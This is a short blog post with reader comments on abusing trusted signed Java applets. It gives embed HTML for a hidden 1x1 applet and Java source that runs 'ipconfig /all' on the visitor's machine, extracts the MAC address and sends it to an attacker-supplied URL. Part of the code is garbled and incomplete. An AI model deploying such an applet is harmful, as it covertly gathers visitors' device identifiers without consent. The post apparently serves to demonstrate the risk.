Trusting Java Applets

abusing the trust people have in signed applets.

It’s been blogged before but oh well I always learn by example so here is an example. The thing I’m talking about is trusting signed java applets. In short when you trust a java applet it can do whatever it wants. So what could you do with a java applet? The java source code will steal your mac address, rather useless but it serves the example purpose good enough. The stolen mac address get’s submitted to a page in this case it will be google which will look like this:

So on the serverside you can just match ip + mac address and build yourself a (maybe) useless database. you could also make some code which does more evil stuff instead of just steal the mac address.

Are you wondering how to sign an java applet? visit the following url:

The html code to embed the applet in your html page is as follow:

<TITLE&gt;Get MacAddress Applet&lt;/TITLE>
Get MacAddress applet<BR>
<applet code="GetMacAddress.class" archive="GetMacAddress.jar" width=1 height=1>

So now for the example code of the “evil” applet.

import java.applet.Applet;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

 * This applet gets the mac address from a windows machine
 * @author DiabloHorn
public class GetMacAddress extends Applet {

    /** Creates a new instance of GetMacAddress*/
     public void init() {
            String macAddress = this.getMacAddress();
            URL url = new URL(this.getParameter("BASEURL")+macAddress);
            getAppletContext().showDocument(url, "_self");
         }catch(Exception e){

    public String getMacAddress() throws IOException {
        String macAddress = null;
        String command = "ipconfig /all";
        Process pid = Runtime.getRuntime().exec(command);
        BufferedReader in = new BufferedReader(new InputStreamReader(pid.getInputStream()));
        while (true) {
            String line = in.readLine();
            if (line == null) {

            Pattern p = Pattern.compile(".*((:?[0-9a-f]{2}[-:]){5}[0-9a-f]{2}).*",Pattern.CASE_INSENSITIVE);
            Matcher m = p.matcher(line);
            if (m.matches()) {
                macAddress =;
        return macAddress;

5 thoughts on “Trusting Java Applets”

  1. If you modify the command it might work yes, I haven’t had the time to test it out. My point was more about signed applets and the endless possibilities.

  2. Hi!
    As far as I know, “ipconfig /all” is for MS Windows. So do you think this applet will be works on the client running linux?

    Please answer me.

  3. Hi,

    Do you have java/applet code that can get the real ip? Thanks…



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: